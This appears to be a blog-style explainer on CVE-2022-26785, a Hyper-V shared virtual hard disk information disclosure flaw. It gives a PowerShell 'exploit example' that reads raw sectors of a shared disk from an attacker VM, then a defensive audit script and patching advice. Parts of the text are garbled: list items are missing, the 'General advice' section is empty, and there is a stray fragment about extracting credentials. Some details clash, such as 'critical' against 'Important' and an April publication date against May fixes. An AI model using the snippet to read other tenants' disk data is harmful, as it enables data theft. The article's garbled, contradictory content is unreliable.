Windows Hyper-V is a powerful hypervisor used for running virtual machines. Discovered in 2022, CVE-2022-26785 is a critical information disclosure vulnerability that affects Shared Virtual Hard Disks (VHDs) in Hyper-V. Compared to other closely numbered vulnerabilities—like CVE-2022-24490, CVE-2022-24539, and CVE-2022-26783—this CVE stands out for its unique attack vector and impact.

Let’s break down what CVE-2022-26785 is, how it can be exploited, and, most importantly, how you can protect your systems.

What is CVE-2022-26785?

At its core, CVE-2022-26785 is an information disclosure flaw in the way Windows Hyper-V handles shared virtual hard disks. When multiple virtual machines (VMs) access a VHD set, improper isolation or permission checks can allow a malicious VM to read data it shouldn't have access to.

Microsoft rates this as Important because it could let an attacker in a guest VM see sensitive details belonging to other VMs that share the same VHD set.

Technical Details

Shared Virtual Hard Disks (VHD Sets) let you attach a single virtual disk to several VMs simultaneously. This is handy for guest clusters—but it also introduces risk if access controls aren’t airtight.

CVE-2022-26785 exists because:

Target VMs also attach to that VHD set

3. The attacker performs a carefully crafted read on the VHD set’s virtual disk file, exposing information belonging to other VMs

It’s important to note: no code execution is needed—just the ability to read from disk.

Exploit Example (Code Snippet)

Suppose you have two VMs, VM-A (the attacker) and VM-B (the victim), both connected to a shared VHD set ClusterDisk.vhdset. The attacker can mount the disk inside their VM and access uninitialized disk sectors or VHD-level metadata.

Below is a rough PowerShell code snippet that demonstrates how an attacker might scan the disk looking for data fragments:

# PowerShell script running inside the attacker's VM (VM-A)
# Requires admin privileges or disk access within the VM

# Get all physical disks
$disks = Get-Disk

# Iterate through each disk and look for the cluster shared VHD set
foreach ($disk in $disks) {
    if ($disk.FriendlyName -like "*ClusterDisk*") {
        $number = $disk.Number
        # Open the physical disk for raw access
        $handle = [System.IO.File]::Open("\\.\PhysicalDrive$number", 'Open', 'Read')
        $bytes = New-Object byte[] 4096
        $handle.Read($bytes, 0, $bytes.Length) | Out-Null
        $handle.Close()
        # Analyze the bytes for interesting information
        $hex = [BitConverter]::ToString($bytes)
        Write-Output "First 4096 bytes of ClusterDisk: $hex"
    }
}

This raw read may expose file fragments or metadata left by another VM, depending on the timing and the way Hyper-V shares the disk.

Potentially extract credentials, configuration secrets, or user data

This becomes especially dangerous in multi-tenant or clustered environments.

References

- Microsoft Security Update Guide - CVE-2022-26785
- Official Fix Details from Microsoft
- Understanding and Using Shared Virtual Hard Disks with Hyper-V

How is CVE-2022-26785 Different from the Others?

CVE-2022-26785: Specifically about info disclosure from shared VHD sets in clustered Hyper-V.

How to Protect Yourself

Apply patches now!  
Microsoft released fixes as part of the May 2022 updates.  
- For Windows Server 2016/2019/2022 and Windows 10/11 with Hyper-V roles, make sure you have installed security updates from or after May 2022.
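A host-side audit for the guidance above, as an added example that is not part of the original article or of Microsoft's tooling: it lists which VMs are attached to each shared VHD set and reports the date of the newest update each Hyper-V host has installed. `$HvHosts`, `$PatchCutoff` and the detection rule (a `.vhds` path or the `SupportPersistentReservations` flag) are assumptions made for this example.

```powershell
# Added example; run from an elevated PowerShell session with the Hyper-V module.
# Assumption: list every node of the cluster here (defaults to the local host only).
$HvHosts     = @($env:COMPUTERNAME)
# Assumption: cutoff taken from the "from or after May 2022" guidance above.
$PatchCutoff = [datetime]'2022-05-01'

# 1. Find virtual disks that are VHD sets (.vhds) or are flagged as shared.
$sharedDisks = Get-VM -ComputerName $HvHosts | Get-VMHardDiskDrive |
    Where-Object { $_.Path -like '*.vhds' -or $_.SupportPersistentReservations }

# 2. Group by backing file so each shared disk lists the VMs attached to it.
$diskReport = $sharedDisks | Group-Object -Property Path | ForEach-Object {
    $vms = @($_.Group | ForEach-Object { '{0}\{1}' -f $_.ComputerName, $_.VMName } |
             Sort-Object -Unique)
    [pscustomobject]@{
        DiskPath    = $_.Name
        VMCount     = $vms.Count
        AttachedVMs = $vms -join ', '
    }
}

# 3. Coarse patch check: date of the newest update each host reports.
$patchReport = foreach ($h in $HvHosts) {
    $latest = Get-HotFix -ComputerName $h |
        Where-Object { $_.InstalledOn } |      # some entries carry no install date
        Sort-Object -Property InstalledOn -Descending |
        Select-Object -First 1
    [pscustomobject]@{
        Host           = $h
        LatestUpdate   = $latest.HotFixID
        InstalledOn    = $latest.InstalledOn
        MeetsCutoff    = [bool]($latest -and $latest.InstalledOn -ge $PatchCutoff)
        HasSharedDisks = [bool]($sharedDisks | Where-Object ComputerName -eq $h)
    }
}

$diskReport  | Sort-Object VMCount -Descending | Format-Table -AutoSize -Wrap
$patchReport | Sort-Object MeetsCutoff | Format-Table -AutoSize
```

A recent install date only shows that the host is taking updates; this page lists no KB numbers, so confirm the specific fix against the Microsoft advisory for each OS build. Hosts where `HasSharedDisks` is true and `MeetsCutoff` is false are the ones to patch first.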

General advice:

Conclusion

CVE-2022-26785 is a potent reminder that even the most useful features—like shared storage—can introduce risks. Administrators running clustered Hyper-V setups should patch without delay, audit their VM configurations, and stay vigilant in managing shared resources.

If you want to dig deeper, check out the official Microsoft Security Update Guide entry. For security professionals and IT teams, it’s another example of how information disclosure can appear in the most unexpected places.

Timeline

Published on: 04/15/2022 19:15:00 UTC
Last modified on: 04/25/2022 16:27:00 UTC